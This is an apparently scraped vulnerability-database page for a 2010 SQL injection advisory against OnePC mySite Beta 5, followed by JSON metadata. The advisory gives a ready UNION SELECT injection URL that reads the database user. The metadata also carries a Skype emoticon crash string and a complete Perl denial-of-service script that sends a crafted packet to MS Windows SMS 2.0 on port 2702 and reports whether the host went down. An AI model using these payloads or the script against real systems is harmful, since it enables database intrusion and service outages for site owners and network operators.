Search...

OnePC mySite Management Software SQL Injection Vulnerability

2010-04-11T00:00:00

ID 1337DAY-ID-11726
Type zdt
Reporter Valentin Hobel
Modified 2010-04-11T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ============================================================
OnePC mySite Management Software SQL Injection Vulnerability
============================================================

:: General information
:: OnePC mySite Management Software SQL Injection Vulnerability
:: by Valentin Hoebel
:: [email protected]

:: Product information
:: Name =  OnePC mySite Management Software
:: Vendor = OnePC
:: Vendor Website = http://www.onepc.net/
:: Affected versions = Beta 5


:: SQL Injection Vulnerability

Vulnerable URL
http://www.some-cool-domain.tld/index.php?view=docs&doc_id=XX

Exploit the vulnerability
http://www.some-cool-domain.tld/index.php?view=docs&doc_id=XX+AND+1=2+UNION+SELECT+concat(user()),concat(user()),concat(user()),concat(user()),5--


:: Additional information
:: Vendor notified = 10.04.2010
:: Advisory published = 11.04.2010
Software seems not to be developed any further, not many websites are using it today.




#  0day.today [2018-03-13]  #

JSON Vulners Source

Initial Source

{"published": "2010-04-11T00:00:00", "id": "1337DAY-ID-11726", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T00:41:45", "bulletin": {"published": "2010-04-11T00:00:00", "id": "1337DAY-ID-11726", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 6.5, "modified": "2016-04-20T00:41:45"}}, "hash": "31ec8e067eda6cfe0ede042bd1f380aeb633ec7e879cdf443208899e4b191a3f", "description": "Exploit for php platform in category web applications", "type": "zdt", "lastseen": "2016-04-20T00:41:45", "edition": 1, "title": "OnePC mySite Management Software SQL Injection Vulnerability", "href": "http://0day.today/exploit/description/11726", "modified": "2010-04-11T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/11726", "references": [], "reporter": "Valentin Hobel", "sourceData": "============================================================\r\nOnePC mySite Management Software SQL Injection Vulnerability\r\n============================================================\r\n\r\n:: General information\r\n:: OnePC mySite Management Software SQL Injection Vulnerability\r\n:: by Valentin Hoebel\r\n:: valentin@xenuser.org\r\n\r\n:: Product information\r\n:: Name = OnePC mySite Management Software\r\n:: Vendor = OnePC\r\n:: Vendor Website = http://www.onepc.net/\r\n:: Affected versions = Beta 5\r\n\r\n\r\n:: SQL Injection Vulnerability\r\n\r\nVulnerable URL\r\nhttp://www.some-cool-domain.tld/index.php?view=docs&doc_id=XX\r\n\r\nExploit the vulnerability\r\nhttp://www.some-cool-domain.tld/index.php?view=docs&doc_id=XX+AND+1=2+UNION+SELECT+concat(user()),concat(user()),concat(user()),concat(user()),5--\r\n\r\n\r\n:: Additional information\r\n:: Vendor notified = 10.04.2010\r\n:: Advisory published = 11.04.2010\r\nSoftware seems not to be developed any further, not many websites are using it today.\r\n\r\n\r\n\n\n# 0day.today [2016-04-19] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "3b997141d1e97145d15a8f94230d27bb", "key": "modified"}, {"hash": "8a95230007463abdb955631033cffbea", "key": "sourceData"}, {"hash": "f51b6efe5ba0cfe5f819587d1cef57e6", "key": "href"}, {"hash": "e9c6ef28ecceab606bb7626b9abbc5ab", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "3b997141d1e97145d15a8f94230d27bb", "key": "published"}, {"hash": "568a74311eece55f2c3f66332c9743ca", "key": "sourceHref"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "56b16f26d6ac388fc4fe7df3c440f32d", "key": "reporter"}], "objectVersion": "1.0"}}], "description": "Exploit for php platform in category web applications", "hash": "7169728ef5681b41c0b34864a42d3f90b6cfaef6ea93c1987ac8bcf74209af43", "enchantments": {"score": {"value": 0.5, "vector": "NONE", "modified": "2018-03-13T14:08:25"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:5866", "SECURITYVULNS:DOC:11726"]}], "modified": "2018-03-13T14:08:25"}, "vulnersScore": 0.5}, "type": "zdt", "lastseen": "2018-03-13T14:08:25", "edition": 2, "title": "OnePC mySite Management Software SQL Injection Vulnerability", "href": "https://0day.today/exploit/description/11726", "modified": "2010-04-11T00:00:00", "bulletinFamily": "exploit", "viewCount": 1, "cvelist": [], "sourceHref": "https://0day.today/exploit/11726", "references": [], "reporter": "Valentin Hobel", "sourceData": "============================================================\r\nOnePC mySite Management Software SQL Injection Vulnerability\r\n============================================================\r\n\r\n:: General information\r\n:: OnePC mySite Management Software SQL Injection Vulnerability\r\n:: by Valentin Hoebel\r\n:: [email\u00a0protected]\r\n\r\n:: Product information\r\n:: Name = OnePC mySite Management Software\r\n:: Vendor = OnePC\r\n:: Vendor Website = http://www.onepc.net/\r\n:: Affected versions = Beta 5\r\n\r\n\r\n:: SQL Injection Vulnerability\r\n\r\nVulnerable URL\r\nhttp://www.some-cool-domain.tld/index.php?view=docs&doc_id=XX\r\n\r\nExploit the vulnerability\r\nhttp://www.some-cool-domain.tld/index.php?view=docs&doc_id=XX+AND+1=2+UNION+SELECT+concat(user()),concat(user()),concat(user()),concat(user()),5--\r\n\r\n\r\n:: Additional information\r\n:: Vendor notified = 10.04.2010\r\n:: Advisory published = 11.04.2010\r\nSoftware seems not to be developed any further, not many websites are using it today.\r\n\r\n\r\n\n\n# 0day.today [2018-03-13] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "2be6c2daa5725f0ae3d3b43df9bdd582", "key": "href"}, {"hash": "3b997141d1e97145d15a8f94230d27bb", "key": "modified"}, {"hash": "3b997141d1e97145d15a8f94230d27bb", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "56b16f26d6ac388fc4fe7df3c440f32d", "key": "reporter"}, {"hash": "7ee32ebff9ccbc05c74b0cc834feefe4", "key": "sourceData"}, {"hash": "620f52cde26e5ce14226d1ec97eea615", "key": "sourceHref"}, {"hash": "e9c6ef28ecceab606bb7626b9abbc5ab", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}

{"securityvulns": [{"lastseen": "2018-08-31T11:09:20", "bulletinFamily": "software", "description": "Application crashes on large number of emote icons.", "modified": "2006-03-07T00:00:00", "published": "2006-03-07T00:00:00", "id": "SECURITYVULNS:VULN:5866", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:5866", "title": "Skype emotions DoS", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:16", "bulletinFamily": "software", "description": "Skype 1.x ( havent tested on 2.x ) windows version has problems with\r\nemoticons when there is a big enough list of them like this :\r\n":D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D"\r\nWhen the user opens the chat window with the icons skype will stop\r\nresponding and crash\r\n\r\n--\r\nBest Regards,\r\nAleksander Hristov < root at securitydot.net > < http://securitydot.net >\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\r\nHosted and sponsored by Secunia - http://secunia.com/", "modified": "2006-03-07T00:00:00", "published": "2006-03-07T00:00:00", "id": "SECURITYVULNS:DOC:11726", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:11726", "title": "[Full-disclosure] Skype emoticons problems / bugs", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2018-01-03T13:19:10", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category dos / poc", "modified": "2004-07-24T00:00:00", "published": "2004-07-24T00:00:00", "id": "1337DAY-ID-5866", "href": "https://0day.today/exploit/description/5866", "type": "zdt", "title": "MS Windows SMS 2.0 Denial of Service Exploit", "sourceData": "============================================\r\nMS Windows SMS 2.0 Denial of Service Exploit\r\n============================================\r\n\r\n\r\n#!/usr/bin/perl\r\n\r\n#############################\r\n#\r\n# SMS DOS proof of concept and test code\r\n#\r\n#############################\r\n\r\nuse Socket;\r\nuse IO::Socket;\r\n\r\nif (@ARGV != 1)\r\n{\r\nprint \"usage: $0 <host or ip>\\n\";\r\nexit;\r\n}\r\n\r\n$host = shift(@ARGV);\r\n\r\n$hexmsg = converthex(\"5243483016004000524348455858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858\");\r\n\r\nprint \"\\nCreating socket for connection to: $host\\n\\n\";\r\n\r\nmy $sock1 = IO::Socket::INET->new (PeerAddr => $host, PeerPort => \"(2702)\", Proto\r\n=> \"tcp\") or die(\"Could not create socket: $!\\n\");\r\n\r\n$sock1->autoflush(1);\r\n\r\nprint $sock1 \"$hexmsg\";\r\n\r\nwhile (<$sock1>)\r\n{\r\nprint;\r\n}\r\n\r\nprint \"\\nPacket sent to $host (please wait) ...\\n\";\r\n\r\nsleep(2);\r\n\r\nprint \"Verifying status of $host ...\\n\";\r\n\r\nsleep(2);\r\n\r\nmy $sock2 = IO::Socket::INET->new (PeerAddr => $host, PeerPort => '(2702)', Proto\r\n=> 'tcp') or die(\"\\nDOS was successful - $host is down ...\\n\");\r\n\r\nprint \"\\nAttempt was not successful. $host is still alive and responding ...\\n\";\r\n\r\nclose($sock1);\r\nclose($sock2);\r\n\r\n#############################\r\n# End main code, start subs\r\n#############################\r\n\r\nsub converthex\r\n{\r\nlocal ($l) = @_;\r\n$l =~ s/([0-9a-f]{1,2})\\s*/sprintf(\"%c\",hex($1))/egi;\r\n\r\nreturn $l;\r\n}\r\n\r\n#############################\r\n# End code\r\n#############################\r\n\r\n\r\n\n# 0day.today [2018-01-03] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/5866"}]}